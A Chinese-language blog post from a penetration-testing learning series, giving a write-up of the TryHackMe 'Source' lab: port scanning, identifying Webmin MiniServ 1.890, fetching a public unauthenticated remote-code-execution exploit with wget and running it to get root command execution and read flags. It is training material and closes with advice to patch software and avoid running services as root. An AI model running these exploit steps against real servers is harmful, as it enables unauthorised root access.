iT邦幫忙

2021 iThome 鐵人賽

DAY 7
0
Security

我想學滲透測試喵喵喵喵!!!!系列 第 7

[Day7] THM Source

昨天的題目主要都是暴力破解,相對之下感覺有一點點無聊,那今天我們來打一個簡單的 Exploit 吧!

今天採用的題目是 Try Hack Me 上面的 Source

掃 Port

  • 跟昨天一樣的起手式,從掃 Port 開始,今天我採用了 rustscan 來進行掃描,Rustscan 最大的優點是掃描速度很快。
    • rustscan -a 10.10.63.154 -r 1-65535
      • 可以發現有開的 Port 是
        • 22
        • 10000
  • 接下來再透過 nmap 進行進一步的掃瞄,只需要掃瞄有開的 Port
    • nmap -A -p22,10000 10.10.63.154
      • 發現 10000 Port 是 MiniServ 1.890

訪問網頁

  • 用瀏覽器直接連上去
  • 發現它有綁 SSL , 要用指定網址才能進
    • 可以把 IP 跟 Domain 綁上 /etc/hosts
    • /etc/hosts 加上下面這行
      • 10.10.63.154 ip-10-10-63-154.eu-west-1.compute.internal
  • 再次訪問
    • 會發現開啟了登入介面

Exploit

  • 透過版本可以查詢到 MiniServ 1.890 Exploit
  • 我們把檔案給下載下來
    • wget https://raw.githubusercontent.com/foxsin34/WebMin-1.890-Exploit-unauthorized-RCE/master/webmin-1.890_exploit.py
  • 嘗試透過 python3 執行
    • 這個程式的使用方式為
      • python3 {程式.py} {IP} {Port} {指令}
    • python3 webmin-1.890_exploit.py 10.10.63.154 10000 id
      • 所以我們對它執行了 Linux 的 id 指令,就回傳回來了
      • 這個程式是透過 root 使用者執行的

取得 Flag

  • 通常 Root 的 Flag 都會放在 /root/root.txt,我們可以試著直接貓它
  • 這題還有使用者的 Flag ,
    • 我們可以先看 home 使用者名稱
      • 透過 ls /home
      • 看到使用者叫做 dark
    • 觀察使用者資料夾
      • ls /home/dark
    • 最終取得使用者的 Flag

心得

這一題題目告訴了我們,使用舊版的程式不更新,攻擊者可以輕易地駭進系統,就算沒有帳號密碼也沒關係。而非必要狀況,也盡量不要使用 Root 權限執行程式,當攻擊者駭入程式後,就可以直接的取得 Root 的權限。


上一篇
[Day6] THM Basic Pentesting
下一篇
[Day8] THM Bolt
系列文
我想學滲透測試喵喵喵喵!!!!30

尚未有邦友留言

立即登入留言